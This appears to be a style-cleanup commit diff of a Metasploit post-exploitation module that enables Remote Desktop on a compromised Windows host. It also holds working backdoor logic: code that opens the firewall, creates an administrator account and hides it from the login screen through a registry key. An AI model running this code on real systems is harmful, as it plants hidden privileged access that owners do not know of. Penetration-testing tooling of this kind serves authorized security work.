code cleanup

Author: busterb

modules/post/windows/manage/enable_rdp.rb

@@ -10,33 +10,43 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::Priv
   include Msf::Post::File
 
-  def initialize(info={})
-    super( update_info( info,
-      'Name'          => 'Windows Manage Enable Remote Desktop',
-      'Description'   => %q{
-          This module enables the Remote Desktop Service (RDP). It provides the options to create
-        an account and configure it to be a member of the Local Administrators and
-        Remote Desktop Users group. It can also forward the target's port 3389/tcp.},
-      'License'       => BSD_LICENSE,
-      'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
-      'Platform'      => [ 'win' ],
-      'SessionTypes'  => [ 'meterpreter' ]
-    ))
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Windows Manage Enable Remote Desktop',
+        'Description'   => %q{
+            This module enables the Remote Desktop Service (RDP). It provides the options to create
+          an account and configure it to be a member of the Local Administrators and
+          Remote Desktop Users group. It can also forward the target's port 3389/tcp.},
+        'License'       => BSD_LICENSE,
+        'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
+        'Platform'      => [ 'win' ],
+        'SessionTypes'  => [ 'meterpreter' ]
+      )
+    )
 
     register_options(
       [
         OptString.new('USERNAME', [ false, 'The username of the user to create.' ]),
         OptString.new('PASSWORD', [ false, 'Password for the user created.' ]),
-        OptBool.new(  'ENABLE',   [ false, 'Enable the RDP Service and Firewall Exception.', true]),
-        OptBool.new(  'FORWARD', [ false, 'Forward remote port 3389 to local Port.', false]),
-        OptInt.new(   'LPORT',    [ false,  'Local port to forward remote connection.', 3389])
-      ])
+        OptBool.new('ENABLE', [ false, 'Enable the RDP Service and Firewall Exception.', true]),
+        OptBool.new('FORWARD', [ false, 'Forward remote port 3389 to local Port.', false]),
+        OptInt.new('LPORT', [ false, 'Local port to forward remote connection.', 3389])
+      ]
+    )
   end
 
   def run
-    if datastore['ENABLE'] or (datastore['USERNAME'] and datastore['PASSWORD'])
-      cleanup_rc = store_loot("host.windows.cleanup.enable_rdp", "text/plain", session,"" ,
-        "enable_rdp_cleanup.rc", "enable_rdp cleanup resource file")
+    if datastore['ENABLE'] || (datastore['USERNAME'] && datastore['PASSWORD'])
+      cleanup_rc = store_loot(
+        "host.windows.cleanup.enable_rdp",
+        "text/plain",
+        session,
+        "",
+        "enable_rdp_cleanup.rc",
+        "enable_rdp cleanup resource file"
+      )
 
       if datastore['ENABLE']
         if is_admin?
@@ -46,9 +56,9 @@ def run
           print_error("Insufficient privileges, Remote Desktop Service was not modified")
         end
       end
-      if datastore['USERNAME'] and datastore['PASSWORD']
+      if datastore['USERNAME'] && datastore['PASSWORD']
         if is_admin?
-          addrdpusr(datastore['USERNAME'], datastore['PASSWORD'],cleanup_rc)
+          addrdpusr(datastore['USERNAME'], datastore['PASSWORD'], cleanup_rc)
         else
           print_error("Insufficient privileges, account was not be created.")
         end
@@ -65,49 +75,48 @@ def enablerd(cleanup_rc)
     key = 'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server'
     value = "fDenyTSConnections"
     begin
-      v = registry_getvaldata(key,value)
+      v = registry_getvaldata(key, value)
       print_status "Enabling Remote Desktop"
       if v == 1
         print_status "\tRDP is disabled; enabling it ..."
-        registry_setvaldata(key,value,0,"REG_DWORD")
-        file_local_write(cleanup_rc,"reg setval -k \'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\' -v 'fDenyTSConnections' -d \"1\"")
+        registry_setvaldata(key, value, 0, "REG_DWORD")
+        file_local_write(cleanup_rc, "reg setval -k \'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\' -v 'fDenyTSConnections' -d \"1\"")
       else
         print_status "\tRDP is already enabled"
       end
-    rescue::Exception => e
+    rescue StandardError => e
       print_status("The following Error was encountered: #{e.class} #{e}")
     end
   end
 
-
   def enabletssrv(cleanup_rc)
     service_name = "termservice"
     srv_info = service_info(service_name)
     begin
       print_status "Setting Terminal Services service startup mode"
       if srv_info[:starttype] != START_TYPE_AUTO
         print_status "\tThe Terminal Services service is not set to auto, changing it to auto ..."
-        unless (service_change_config(service_name, {:starttype => "START_TYPE_AUTO"}) == Windows::Error::SUCCESS)
+        unless service_change_config(service_name, starttype: "START_TYPE_AUTO") == Windows::Error::SUCCESS
           print_error("\tUnable to change start type to Auto")
         end
-        file_local_write(cleanup_rc,"execute -H -f cmd.exe -a \"/c sc config termservice start= disabled\"")
-        if (service_start(service_name) == Windows::Error::SUCCESS)
+        file_local_write(cleanup_rc, "execute -H -f cmd.exe -a \"/c sc config termservice start= disabled\"")
+        if service_start(service_name) == Windows::Error::SUCCESS
           print_good("\tRDP Service Started")
         end
-        file_local_write(cleanup_rc,"execute -H -f cmd.exe -a \"/c sc stop termservice\"")
+        file_local_write(cleanup_rc, "execute -H -f cmd.exe -a \"/c sc stop termservice\"")
       else
         print_status "\tTerminal Services service is already set to auto"
       end
-      #Enabling Exception on the Firewall
+      # Enabling Exception on the Firewall
       print_status "\tOpening port in local firewall if necessary"
       cmd_exec('netsh', 'firewall set service type = remotedesktop mode = enable', 30)
-      file_local_write(cleanup_rc,"execute -H -f cmd.exe -a \"/c 'netsh firewall set service type = remotedesktop mode = enable'\"")
-    rescue::Exception => e
+      file_local_write(cleanup_rc, "execute -H -f cmd.exe -a \"/c 'netsh firewall set service type = remotedesktop mode = enable'\"")
+    rescue StandardError => e
       print_status("The following Error was encountered: #{e.class} #{e}")
     end
   end
 
-  def addrdpusr(username, password,cleanup_rc)
+  def addrdpusr(username, password, cleanup_rc)
     print_status "Setting user account for logon"
     print_status "\tAdding User: #{username} with Password: #{password}"
     begin
@@ -139,16 +148,16 @@ def addrdpusr(username, password,cleanup_rc)
       end
 
       if user_added
-        file_local_write(cleanup_rc,"execute -H -f cmd.exe -a \"/c net user #{username} /delete\"")
+        file_local_write(cleanup_rc, "execute -H -f cmd.exe -a \"/c net user #{username} /delete\"")
         print_status "\tAdding User: #{username} to local group '#{rdu}'"
-        cmd_exec("cmd.exe","/c net localgroup \"#{rdu}\" #{username} /add")
+        cmd_exec("cmd.exe", "/c net localgroup \"#{rdu}\" #{username} /add")
 
         print_status "\tHiding user from Windows Login screen"
         hide_user_key = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList'
-        registry_setvaldata(hide_user_key,username,0,"REG_DWORD")
-        file_local_write(cleanup_rc,"reg deleteval -k HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList -v #{username}")
+        registry_setvaldata(hide_user_key, username, 0, "REG_DWORD")
+        file_local_write(cleanup_rc, "reg deleteval -k HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList -v #{username}")
         print_status "\tAdding User: #{username} to local group '#{admin}'"
-        cmd_exec("cmd.exe","/c net localgroup #{admin}  #{username} /add")
+        cmd_exec("cmd.exe", "/c net localgroup #{admin}  #{username} /add")
         print_status "You can now login with the created user"
       else
         print_error("Account could not be created")
@@ -157,17 +166,12 @@ def addrdpusr(username, password,cleanup_rc)
           print_error("\t#{l.chomp}")
         end
       end
-    rescue ::Exception => e
+    rescue StandardError => e
       print_status("The following Error was encountered: #{e.class} #{e}")
     end
   end
 
   def check_user(user)
-    output = cmd_exec('cmd.exe', '/c net user')
-    if output.include?(user)
-        return true
-    end
-
-    false
+    cmd_exec('cmd.exe', '/c net user').include?(user)
   end
 end